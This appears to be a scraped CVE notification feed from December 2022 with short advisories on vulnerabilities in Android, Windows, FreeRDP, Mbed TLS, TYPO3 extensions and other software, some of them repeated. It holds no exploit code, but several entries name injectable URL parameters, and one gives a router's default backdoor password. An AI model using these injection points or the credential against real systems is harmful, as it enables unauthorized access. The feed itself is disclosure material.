🚨 CVE-2022-47515An issue was discovered in drachtio-server before 0.8.20. It allows remote attackers to cause a denial of service (daemon crash) via a long message in a TCP request that leads to std::length_error.🎖@cveNotify |
|
| 2022-12-18 14:29:44 |
🚨 CVE-2022-47517An issue was discovered in the libsofia-sip fork in drachtio-server before 0.8.19. It allows remote attackers to cause a denial of service (daemon crash) via a crafted UDP message that causes a url_canonize2 heap-based buffer over-read because of an off-by-one error.🎖@cveNotify |
|
| 2022-12-18 14:29:43 |
🚨 CVE-2022-47514An XML external entity (XXE) injection vulnerability in XML-RPC.NET before 2.5.0 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks, as demonstrated by a pingback.aspx POST request.🎖@cveNotify |
|
| 2022-12-18 14:29:42 |
🚨 CVE-2022-45061An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.🎖@cveNotify |
|
| 2022-12-18 14:29:38 |
🚨 CVE-2021-46848GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.🎖@cveNotify |
|
| 2022-12-18 14:29:37 |
🚨 CVE-2022-1941A parsing vulnerability for the MessageSet type in the ProtocolBuffers versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 3.21.5 for protobuf-cpp, and versions prior to and including 3.16.1, 3.17.3, 3.18.2, 3.19.4, 3.20.1 and 4.21.5 for protobuf-python can lead to out of memory failures. A specially crafted message with multiple key-value per elements creates parsing issues, and can lead to a Denial of Service against services receiving unsanitized input. We recommend upgrading to versions 3.18.3, 3.19.5, 3.20.2, 3.21.6 for protobuf-cpp and 3.18.3, 3.19.5, 3.20.2, 4.21.6 for protobuf-python. Versions for 3.16 and 3.17 are no longer updated.🎖@cveNotify |
|
| 2022-12-18 14:29:36 |
🚨 CVE-2022-4590A vulnerability was found in mschaef toto up to 1.4.20. It has been classified as problematic. This affects an unknown part of the component Todo List Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.4.21 is able to address this issue. The name of the patch is fdc825ac5249f40683377e8a526a06cdc6870125. It is recommended to upgrade the affected component. The identifier VDB-216177 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-17 00:30:01 |
🚨 CVE-2022-47409An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. Attackers can unsubscribe everyone via a series of modified subscription UIDs in deleteAction operations.🎖@cveNotify |
|
| 2022-12-17 00:30:00 |
🚨 CVE-2022-47410An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. Data about subscribers may be obtained via createAction operations.🎖@cveNotify |
|
| 2022-12-17 00:29:59 |
🚨 CVE-2022-47411An issue was discovered in the fp_newsletter (aka Newsletter subscriber management) extension before 1.1.1, 1.2.0, 2.x before 2.1.2, 2.2.1 through 2.4.0, and 3.x before 3.2.6 for TYPO3. Data about subscribers may be obtained via unsubscribeAction operations.🎖@cveNotify |
|
| 2022-12-17 00:29:58 |
🚨 CVE-2022-46670Rockwell Automation was made aware of a vulnerability by a security researcher from Georgia Institute of Technology that the MicroLogix 1100 and 1400 controllers contain a vulnerability that may give an attacker the ability to accomplish remote code execution. The vulnerability is an unauthenticated stored cross-site scripting vulnerability in the embedded webserver. The payload is transferred to the controller over SNMP and is rendered on the homepage of the embedded website.🎖@cveNotify |
|
| 2022-12-17 00:29:56 |
🚨 CVE-2022-3157A vulnerability exists in the Rockwell Automation controllers that allows a malformed CIP request to cause a major non-recoverable fault (MNRF) and a denial-of-service condition (DOS).🎖@cveNotify |
|
| 2022-12-17 00:29:55 |
🚨 CVE-2022-2966Out-of-bounds Read vulnerability in Delta Electronics DOPSoft.This issue affects DOPSoft: All Versions.🎖@cveNotify |
|
| 2022-12-17 00:29:54 |
🚨 CVE-2022-3166Rockwell Automation was made aware that the webservers of the Micrologix 1100 and 1400 controllers contain a vulnerability that may lead to a denial-of-service condition. The security vulnerability could be exploited by an attacker with network access to the affected systems by sending TCP packets to webserver and closing it abruptly which would cause a denial-of-service condition for the web server application on the device🎖@cveNotify |
|
| 2022-12-17 00:29:53 |
🚨 CVE-2022-47208The “puhttpsniff” service, which runs by default, is susceptible to command injection due to improperly sanitized user input. An unauthenticated attacker on the same network segment as the router can execute arbitrary commands on the device without authentication.🎖@cveNotify |
|
| 2022-12-17 00:29:52 |
🚨 CVE-2022-47209A support user exists on the device and appears to be a backdoor for Technical Support staff. The default password for this account is “support” and cannot be changed by a user via any normally accessible means.🎖@cveNotify |
|
| 2022-12-17 00:29:50 |
🚨 CVE-2022-47210The default console presented to users over telnet (when enabled) is restricted to a subset of commands. Commands issued at this console, however, appear to be fed directly into a system call or other similar function. This allows any authenticated user to execute arbitrary commands on the device.🎖@cveNotify |
|
| 2022-12-17 00:29:49 |
🚨 CVE-2022-47407An issue was discovered in the fp_masterquiz (aka Master-Quiz) extension before 2.2.1, and 3.x before 3.5.1, for TYPO3. An attacker can continue the quiz of a different user. In doing so, the attacker can view that user's answers and modify those answers.🎖@cveNotify |
|
| 2022-12-17 00:29:48 |
🚨 CVE-2022-31703vRealize Network Insight (vRNI) directory traversal vulnerability in vRNI REST API. A malicious actor with network access to the vRNI REST API can read arbitrary files from the server.🎖@cveNotify |
|
| 2022-12-17 00:29:47 |
🚨 CVE-2022-23519rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. Prior to version 1.4.4, a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags in either of the following ways: allow both "math" and "style" elements, or allow both "svg" and "style" elements. Code is only impacted if allowed tags are being overridden. . This issue is fixed in version 1.4.4. All users overriding the allowed tags to include "math" or "svg" and "style" should either upgrade or use the following workaround immediately: Remove "style" from the overridden allowed tags, or remove "math" and "svg" from the overridden allowed tags.🎖@cveNotify |
|
| 2022-12-17 00:29:46 |
🚨 CVE-2022-2949Altair HyperView Player versions 2021.1.0.27 and prior are vulnerable to the use of uninitialized memory vulnerability during parsing of H3D files. A DWORD is extracted from an uninitialized buffer and, after sign extension, is used as an index into a stack variable to increment a counter leading to memory corruption.🎖@cveNotify |
|
| 2022-12-17 00:29:45 |
🚨 CVE-2022-2947Altair HyperView Player versions 2021.1.0.27 and prior perform operations on a memory buffer but can read from or write to a memory location outside of the intended boundary of the buffer. This hits initially as a read access violation, leading to a memory corruption situation.🎖@cveNotify |
|
| 2022-12-17 00:29:41 |
🚨 CVE-2022-3110An issue was discovered in the Linux kernel through 5.16-rc6. _rtw_init_xmit_priv in drivers/staging/r8188eu/core/rtw_xmit.c lacks check of the return value of rtw_alloc_hwxmits() and will cause the null pointer dereference.🎖@cveNotify |
|
| 2022-12-17 00:29:40 |
🚨 CVE-2022-3108An issue was discovered in the Linux kernel through 5.16-rc6. kfd_parse_subtype_iolink in drivers/gpu/drm/amd/amdkfd/kfd_crat.c lacks check of the return value of kmemdup().🎖@cveNotify |
|
| 2022-12-17 00:29:39 |
🚨 CVE-2022-23520rails-html-sanitizer is responsible for sanitizing HTML fragments in Rails applications. Prior to version 1.4.4, there is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer due to an incomplete fix of CVE-2022-32209. Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags to allow both "select" and "style" elements. Code is only impacted if allowed tags are being overridden. This issue is patched in version 1.4.4. All users overriding the allowed tags to include both "select" and "style" should either upgrade or use this workaround: Remove either "select" or "style" from the overridden allowed tags. NOTE: Code is _not_ impacted if allowed tags are overridden using either the :tags option to the Action View helper method sanitize or the :tags option to the instance method SafeListSanitizer#sanitize.🎖@cveNotify |
|
| 2022-12-17 00:29:38 |
🚨 CVE-2022-3106An issue was discovered in the Linux kernel through 5.16-rc6. ef100_update_stats in drivers/net/ethernet/sfc/ef100_nic.c lacks check of the return value of kmalloc().🎖@cveNotify |
|
| 2022-12-17 00:29:37 |
🚨 CVE-2022-3107An issue was discovered in the Linux kernel through 5.16-rc6. netvsc_get_ethtool_stats in drivers/net/hyperv/netvsc_drv.c lacks check of the return value of kvmalloc_array() and will cause the null pointer dereference.🎖@cveNotify |
|
| 2022-12-16 20:29:36 |
🚨 CVE-2022-34271A vulnerability in import module of Apache Atlas allows an authenticated user to write to web server filesystem. This issue affects Apache Atlas versions from 0.8.4 to 2.2.0.🎖@cveNotify |
|
| 2022-12-16 19:29:55 |
🚨 CVE-2022-20503In onCreate of WifiDppConfiguratorActivity.java, there is a possible way for a guest user to add a WiFi configuration due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-224772890🎖@cveNotify |
|
| 2022-12-16 19:29:54 |
🚨 CVE-2022-20504In multiple locations of DreamManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and dismissal of system dialogs with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-225878553🎖@cveNotify |
|
| 2022-12-16 19:29:53 |
🚨 CVE-2022-20504In multiple locations of DreamManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and dismissal of system dialogs with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-225878553🎖@cveNotify |
|
| 2022-12-16 19:29:49 |
🚨 CVE-2022-20506In onCreate of WifiDialogActivity.java, there is a missing permission check. This could lead to local escalation of privilege from a guest user with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-226133034🎖@cveNotify |
|
| 2022-12-16 19:29:48 |
🚨 CVE-2022-20512In navigateUpTo of Task.java, there is a possible way to launch an intent handler with a mismatched intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-238602879🎖@cveNotify |
|
| 2022-12-16 19:29:47 |
🚨 CVE-2022-20505In openFile of CallLogProvider.java, there is a possible permission bypass due to a path traversal error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitationProduct: AndroidVersions: Android-13Android ID: A-225981754🎖@cveNotify |
|
| 2022-12-16 19:29:43 |
🚨 CVE-2022-20507In onMulticastListUpdateNotificationReceived of UwbEventManager.java, there is a possible arbitrary code execution due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-246649179🎖@cveNotify |
|
| 2022-12-16 19:29:42 |
🚨 CVE-2022-20511In getNearbyAppStreamingPolicy of DevicePolicyManagerService.java, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-235821829🎖@cveNotify |
|
| 2022-12-16 19:29:41 |
🚨 CVE-2022-20510In getNearbyNotificationStreamingPolicy of DevicePolicyManagerService.java, there is a possible way to learn about the notification streaming policy of other users due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-235822336🎖@cveNotify |
|
| 2022-12-16 19:29:37 |
🚨 CVE-2022-20517In getMessagesByPhoneNumber of MmsSmsProvider.java, there is a possible access to restricted tables due to SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-224769956🎖@cveNotify |
|
| 2022-12-16 19:29:36 |
🚨 CVE-2022-20520In onCreate of various files, there is a possible tapjacking/overlay attack. This could lead to local escalation of privilege or denial of server with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-227203202🎖@cveNotify |
|
| 2022-12-16 19:29:35 |
🚨 CVE-2022-20518In query of MmsSmsProvider.java, there is a possible access to restricted tables due to SQL injection. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-224770203🎖@cveNotify |
|
| 2022-12-16 15:29:55 |
🚨 CVE-2022-36223In Emby Server 4.6.7.0, the playlist name field is vulnerable to XSS stored where it is possible to steal the administrator access token and flip or steal the media server administrator account.🎖@cveNotify |
|
| 2022-12-16 15:29:54 |
🚨 CVE-2022-4555The WP Shamsi plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the deactivate() function hooked via init() in versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to deactivate arbitrary plugins on the site. This can be used to deactivate security plugins that aids in exploiting other vulnerabilities.🎖@cveNotify |
|
| 2022-12-16 15:29:53 |
🚨 CVE-2022-44679Windows Graphics Component Information Disclosure Vulnerability. This CVE ID is unique from CVE-2022-41074.🎖@cveNotify |
|
| 2022-12-16 15:29:49 |
🚨 CVE-2022-44683Windows Kernel Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2022-12-16 15:29:48 |
🚨 CVE-2022-44677Windows Projected File System Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2022-12-16 15:29:47 |
🚨 CVE-2022-44697Windows Graphics Component Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-41121, CVE-2022-44671, CVE-2022-44680.🎖@cveNotify |
|
| 2022-12-16 15:29:43 |
🚨 CVE-2022-44681Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-44678.🎖@cveNotify |
|
| 2022-12-16 15:29:42 |
🚨 CVE-2022-44690Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-44693.🎖@cveNotify |
|
| 2022-12-16 15:29:41 |
🚨 CVE-2022-46118Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=product_per_brand&bid=.🎖@cveNotify |
|
| 2022-12-16 15:29:37 |
🚨 CVE-2022-46120Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/view_product&id=.🎖@cveNotify |
|
| 2022-12-16 15:29:36 |
🚨 CVE-2022-46122Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/view_category.php?id=.🎖@cveNotify |
|
| 2022-12-16 15:29:35 |
🚨 CVE-2022-46123Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/manage_category.php?id=.🎖@cveNotify |
|
| 2022-12-16 14:29:46 |
🚨 CVE-2022-40004Cross Site Scripting (XSS) vulnerability in Things Board 3.4.1 allows remote attackers to escalate privilege via crafted URL to the Audit Log.🎖@cveNotify |
|
| 2022-12-16 14:29:45 |
🚨 CVE-2022-45338An arbitrary file upload vulnerability in the profile picture upload function of Exact Synergy Enterprise 267 before 267SP13 and Exact Synergy Enterprise 500 before 500SP6 allows attackers to execute arbitrary code via a crafted SVG file.🎖@cveNotify |
|
| 2022-12-16 14:29:44 |
🚨 CVE-2022-45969Alist v3.4.0 is vulnerable to Directory Traversal,🎖@cveNotify |
|
| 2022-12-16 14:29:43 |
🚨 CVE-2022-46392An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. An adversary with access to precise enough information about memory accesses (typically, an untrusted operating system attacking a secure enclave) can recover an RSA private key after observing the victim performing a single private-key operation, if the window size (MBEDTLS_MPI_WINDOW_SIZE) used for the exponentiation is 3 or smaller.🎖@cveNotify |
|
| 2022-12-16 14:29:41 |
🚨 CVE-2022-46393An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. There is a potential heap-based buffer overflow and heap-based buffer over-read in DTLS if MBEDTLS_SSL_DTLS_CONNECTION_ID is enabled and MBEDTLS_SSL_CID_IN_LEN_MAX > 2 * MBEDTLS_SSL_CID_OUT_LEN_MAX.🎖@cveNotify |
|
| 2022-12-16 14:29:40 |
🚨 CVE-2022-41960BigBlueButton is an open source web conferencing system. Versions prior to 2.4.3, are subject to Insufficient Verification of Data Authenticity, resulting in Denial of Service. An attacker can make a Meteor call to `validateAuthToken` using a victim's userId, meetingId, and an invalid authToken. This forces the victim to leave the conference, because the resulting verification failure is also observed and handled by the victim's client. The attacker must be a participant in any meeting on the server. This issue is patched in version 2.4.3. There are no workarounds.🎖@cveNotify |
|
| 2022-12-16 14:29:39 |
🚨 CVE-2022-46631TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiSignalCfg function.🎖@cveNotify |
|
| 2022-12-16 14:29:38 |
🚨 CVE-2022-46634TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.🎖@cveNotify |
|
| 2022-12-16 07:30:07 |
🚨 CVE-2022-39319FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP are missing input length validation in the `urbdrc` channel. A malicious server can trick a FreeRDP based client to read out of bound data and send it back to the server. This issue has been addressed in version 2.9.0 and all users are advised to upgrade. Users unable to upgrade should not use the `/usb` redirection switch.🎖@cveNotify |
|
| 2022-12-16 07:30:06 |
🚨 CVE-2022-39316FreeRDP is a free remote desktop protocol library and clients. In affected versions there is an out of bound read in ZGFX decoder component of FreeRDP. A malicious server can trick a FreeRDP based client to read out of bound data and try to decode it likely resulting in a crash. This issue has been addressed in the 2.9.0 release. Users are advised to upgrade.🎖@cveNotify |
|
| 2022-12-16 07:30:04 |
🚨 CVE-2022-39320FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP may attempt integer addition on too narrow types leads to allocation of a buffer too small holding the data written. A malicious server can trick a FreeRDP based client to read out of bound data and send it back to the server. This issue has been addressed in version 2.9.0 and all users are advised to upgrade. Users unable to upgrade should not use the `/usb` redirection switch.🎖@cveNotify |
|
| 2022-12-16 07:30:02 |
🚨 CVE-2022-39347FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP are missing path canonicalization and base path check for `drive` channel. A malicious server can trick a FreeRDP based client to read files outside the shared directory. This issue has been addressed in version 2.9.0 and all users are advised to upgrade. Users unable to upgrade should not use the `/drive`, `/drives` or `+home-drive` redirection switch.🎖@cveNotify |
|
| 2022-12-16 07:30:00 |
🚨 CVE-2022-41877FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP are missing input length validation in `drive` channel. A malicious server can trick a FreeRDP based client to read out of bound data and send it back to the server. This issue has been addressed in version 2.9.0 and all users are advised to upgrade. Users unable to upgrade should not use the drive redirection channel - command line options `/drive`, `+drives` or `+home-drive`.🎖@cveNotify |
|
| 2022-12-16 07:29:59 |
🚨 CVE-2022-45061An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.🎖@cveNotify |
|
| 2022-12-16 07:29:58 |
🚨 CVE-2022-39283FreeRDP is a free remote desktop protocol library and clients. All FreeRDP based clients when using the `/video` command line switch might read uninitialized data, decode it as audio/video and display the result. FreeRDP based server implementations are not affected. This issue has been patched in version 2.8.1. If you cannot upgrade do not use the `/video` switch.🎖@cveNotify |
|
| 2022-12-16 07:29:56 |
🚨 CVE-2022-39282FreeRDP is a free remote desktop protocol library and clients. FreeRDP based clients on unix systems using `/parallel` command line switch might read uninitialized data and send it to the server the client is currently connected to. FreeRDP based server implementations are not affected. Please upgrade to 2.8.1 where this issue is patched. If unable to upgrade, do not use parallel port redirection (`/parallel` command line switch) as a workaround.🎖@cveNotify |
|
| 2022-12-16 07:29:55 |
🚨 CVE-2022-46059AeroCMS v0.0.1 is vulnerable to Cross Site Request Forgery (CSRF).🎖@cveNotify |
|
| 2022-12-16 07:29:53 |
🚨 CVE-2022-46363A vulnerability in Apache CXF before versions 3.5.5 and 3.4.10 allows an attacker to perform a remote directory listing or code exfiltration. The vulnerability only applies when the CXFServlet is configured with both the static-resources-list and redirect-query-check attributes. These attributes are not supposed to be used together, and so the vulnerability can only arise if the CXF service is misconfigured.🎖@cveNotify |
|
| 2022-12-16 07:29:52 |
🚨 CVE-2022-45871A Denial-of-Service (DoS) vulnerability was discovered in the fsicapd component used in WithSecure products whereby the service may crash while parsing ICAP request. The exploit can be triggered remotely by an attacker.🎖@cveNotify |
|
| 2022-12-16 07:29:51 |
🚨 CVE-2022-44303Resque Scheduler version 1.27.4 is vulnerable to Cross-site scripting (XSS). A remote attacker could inject javascript code to the "{schedule_job}" or "args" parameter in /resque/delayed/jobs/{schedule_job}?args={args_id} to execute javascript at client side.🎖@cveNotify |
|
| 2022-12-16 07:29:49 |
🚨 CVE-2022-38124Debug tool in Secomea SiteManager allows logged-in administrator to modify system state in an unintended manner.🎖@cveNotify |
|
| 2022-12-16 07:29:48 |
🚨 CVE-2022-4446PHP Remote File Inclusion in GitHub repository tsolucio/corebos prior to 8.0.🎖@cveNotify |
|
| 2022-12-16 07:29:46 |
🚨 CVE-2022-45688A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.🎖@cveNotify |
|
| 2022-12-16 07:29:45 |
🚨 CVE-2022-45685A stack overflow in Jettison before v1.5.2 allows attackers to cause a Denial of Service (DoS) via crafted JSON data.🎖@cveNotify |
|
| 2022-12-16 07:29:44 |
🚨 CVE-2022-46061AeroCMS v0.0.1 is vulnerable to ClickJacking.🎖@cveNotify |
|
| 2022-12-16 07:29:42 |
🚨 CVE-2022-45689hutool-json v5.8.10 was discovered to contain an out of memory error.🎖@cveNotify |
|
| 2022-12-16 07:29:41 |
🚨 CVE-2022-45690A stack overflow in the org.json.JSONTokener.nextValue::JSONTokener.java component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.🎖@cveNotify |
|
| 2022-12-16 07:29:40 |
🚨 CVE-2022-45693Jettison before v1.5.2 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.🎖@cveNotify |
|
| 2022-12-16 02:29:41 |
🚨 CVE-2022-41960BigBlueButton is an open source web conferencing system. Versions prior to 2.4.3, are subject to Insufficient Verification of Data Authenticity, resulting in Denial of Service. An attacker can make a Meteor call to `validateAuthToken` using a victim's userId, meetingId, and an invalid authToken. This forces the victim to leave the conference, because the resulting verification failure is also observed and handled by the victim's client. The attacker must be a participant in any meeting on the server. This issue is patched in version 2.4.3. There are no workarounds.🎖@cveNotify |
|
| 2022-12-16 02:29:38 |
🚨 CVE-2022-40004Cross Site Scripting (XSS) vulnerability in Things Board 3.4.1 allows remote attackers to escalate privilege via crafted URL to the Audit Log.🎖@cveNotify |
|
| 2022-12-16 02:29:37 |
🚨 CVE-2022-45338An arbitrary file upload vulnerability in the profile picture upload function of Exact Synergy Enterprise 267 before 267SP13 and Exact Synergy Enterprise 500 before 500SP6 allows attackers to execute arbitrary code via a crafted SVG file.🎖@cveNotify |
|
| 2022-12-16 02:29:36 |
🚨 CVE-2022-46392An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. An adversary with access to precise enough information about memory accesses (typically, an untrusted operating system attacking a secure enclave) can recover an RSA private key after observing the victim performing a single private-key operation, if the window size (MBEDTLS_MPI_WINDOW_SIZE) used for the exponentiation is 3 or smaller.🎖@cveNotify |
|
| 2022-12-16 02:29:35 |
🚨 CVE-2022-46393An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. There is a potential heap-based buffer overflow and heap-based buffer over-read in DTLS if MBEDTLS_SSL_DTLS_CONNECTION_ID is enabled and MBEDTLS_SSL_CID_IN_LEN_MAX > 2 * MBEDTLS_SSL_CID_OUT_LEN_MAX.🎖@cveNotify |
|
| 2022-12-15 23:30:04 |
🚨 CVE-2022-4522A vulnerability classified as problematic was found in CalendarXP up to 10.0.1. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 10.0.2 is able to address this issue. The name of the patch is e3715b2228ddefe00113296069969f9e184836da. It is recommended to upgrade the affected component. VDB-215902 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:30:02 |
🚨 CVE-2022-4523A vulnerability, which was classified as problematic, has been found in vexim2. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 21c0a60d12e9d587f905cd084b2c70f9b1592065. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215903.🎖@cveNotify |
|
| 2022-12-15 23:30:01 |
🚨 CVE-2022-4524A vulnerability, which was classified as problematic, was found in Roots soil Plugin up to 4.1.0. Affected is the function language_attributes of the file src/Modules/CleanUpModule.php. The manipulation of the argument language leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 4.1.1 is able to address this issue. The name of the patch is 0c9151e00ab047da253e5cdbfccb204dd423269d. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215904.🎖@cveNotify |
|
| 2022-12-15 23:29:59 |
🚨 CVE-2022-4525A vulnerability has been found in National Sleep Research Resource sleepdata.org up to 59.0.0.rc and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 59.0.0 is able to address this issue. The name of the patch is da44a3893b407087829b006d09339780919714cd. It is recommended to upgrade the affected component. The identifier VDB-215905 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:57 |
🚨 CVE-2022-4526A vulnerability was found in django-photologue up to 3.15.1 and classified as problematic. Affected by this issue is some unknown functionality of the file photologue/templates/photologue/photo_detail.html of the component Default Template Handler. The manipulation of the argument object.caption leads to cross site scripting. The attack may be launched remotely. Upgrading to version 3.16 is able to address this issue. The name of the patch is 960cb060ce5e2964e6d716ff787c72fc18a371e7. It is recommended to apply a patch to fix this issue. VDB-215906 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:56 |
🚨 CVE-2022-4527A vulnerability was found in collective.task up to 3.0.9. It has been classified as problematic. This affects the function renderCell/AssignedGroupColumn of the file src/collective/task/browser/table.py. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 3.0.10 is able to address this issue. The name of the patch is 1aac7f83fa2c2b41d59ba02748912953461f3fac. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215907.🎖@cveNotify |
|
| 2022-12-15 23:29:55 |
🚨 CVE-2021-4245A vulnerability classified as problematic has been found in chbrown rfc6902. This affects an unknown part of the file pointer.ts. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The exploit has been disclosed to the public and may be used. The name of the patch is c006ce9faa43d31edb34924f1df7b79c137096cf. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215883.🎖@cveNotify |
|
| 2022-12-15 23:29:53 |
🚨 CVE-2022-4511A vulnerability has been found in RainyGao DocSys and classified as critical. Affected by this vulnerability is an unknown functionality of the component com.DocSystem.controller.UserController#getUserImg. The manipulation leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215851.🎖@cveNotify |
|
| 2022-12-15 23:29:52 |
🚨 CVE-2022-4513A vulnerability, which was classified as problematic, has been found in European Environment Agency eionet.contreg. This issue affects some unknown processing. The manipulation of the argument searchTag/resourceUri leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2022-06-27T0948 is able to address this issue. The name of the patch is a120c2153e263e62c4db34a06ab96a9f1c6bccb6. It is recommended to upgrade the affected component. The identifier VDB-215885 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:50 |
🚨 CVE-2022-4514A vulnerability, which was classified as problematic, was found in Opencaching Deutschland oc-server3. Affected is an unknown function of the file htdocs/lang/de/ocstyle/varset.inc.php. The manipulation of the argument varvalue leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 4bdd6a0e7b7760cea03b91812cbb80d7b16e3b5f. It is recommended to apply a patch to fix this issue. VDB-215886 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:49 |
🚨 CVE-2022-41094Windows Hyper-V Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:48 |
🚨 CVE-2022-41089.NET Framework Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:46 |
🚨 CVE-2022-41077Windows Fax Compose Form Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:45 |
🚨 CVE-2022-41076PowerShell Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:44 |
🚨 CVE-2022-41074Windows Graphics Component Information Disclosure Vulnerability. This CVE ID is unique from CVE-2022-44679.🎖@cveNotify |
|
| 2022-12-15 23:29:42 |
🚨 CVE-2022-41127Microsoft Dynamics NAV and Microsoft Dynamics 365 Business Central (On Premises) Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2022-12-15 23:29:41 |
